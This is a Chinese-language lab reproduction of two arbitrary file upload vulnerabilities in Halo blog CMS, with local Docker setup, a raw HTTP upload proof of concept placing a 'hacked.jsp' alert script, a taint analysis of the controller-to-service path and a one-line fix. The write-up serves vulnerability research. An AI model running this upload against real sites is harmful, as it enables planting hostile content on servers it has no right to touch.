【漏洞复现】CVE-2022-26619 CVE-2022-32994 Arbitrary File Upload

漏洞信息

NVD - CVE-2022-26619

Halo Blog CMS v1.4.17 was discovered to allow attackers to upload arbitrary files via the Attachment Upload function.

NVD - CVE-2022-32994

Halo CMS v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the component /api/admin/attachments/upload.

背景介绍

Halo is an open-source, self-hosted blog platform built with Java. It is designed to be simple, fast, and flexible, allowing users to create and manage blogs with ease. Halo offers a clean and modern user interface, supports Markdown for writing posts, and provides various customization options such as themes and plugins.

• 主页：https://www.halo.run/

• 源码：https://github.com/halo-dev/halo

环境搭建

$ docker pull swimminghao/halo:1.5.3
$ docker run -d \-p 8090:8090 \swimminghao/halo:1.5.3

先访问http://127.0.0.1:8090/会直接跳转到安装向导，按照提示完成安装：

Web UI: http://127.0.0.1:8090/admin/index.html#/login

账号密码：admin / 88888888

漏洞复现

文件上传漏洞所以先准备好上传的脚本：

$ touch hacked.jsp
$ echo "<script>alert(\"You are hacked\!\")</script>" > hacked.jsp

这是个简单的js脚本，打开就可以弹窗测试是否被javascript解析：

两个漏洞差不多，只是前端API不一样：

CVE-2022-26619：附件→上传，上传附件

CVE-2022-32994：外观→主题设置→样式设置，上传文件

抓包信息如下，发包后可以得到回显PATH：

POC：

POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Admin-Authorization: 8fb5b0e9619e4f1b87202985e6916c6b
Content-Type: multipart/form-data; boundary=---------------------------173360575825736325452909371224
Content-Length: 279
Origin: http://127.0.0.1:8090
Connection: keep-alive
Referer: http://127.0.0.1:8090/admin/index.html
Cookie: JSESSIONID=node01ntfyvfpqwkqs1hd6cxvgk8qmy1.node0-----------------------------173360575825736325452909371224
Content-Disposition: form-data; name="file"; filename="hacked.jsp"
Content-Type: application/octet-stream<script>alert("You are hacked\!")</script>-----------------------------173360575825736325452909371224--

按照回显的PATH能够访问文件，而且文件被javascript前端解析：

漏洞分析

source位于run.halo.app.controller.admin.api.AttachmentController#uploadAttachment，通过POST请求：

sink位于run.halo.app.service.impl.AttachmentServiceImpl#create：

污点从source到达sink之前，仅仅经历了一个Assert.notNull过滤确保文件不为空，在run.halo.app.service.impl.AttachmentServiceImpl#upload中：

修复方案

对上传的Attachment对象进行全面的安全检查。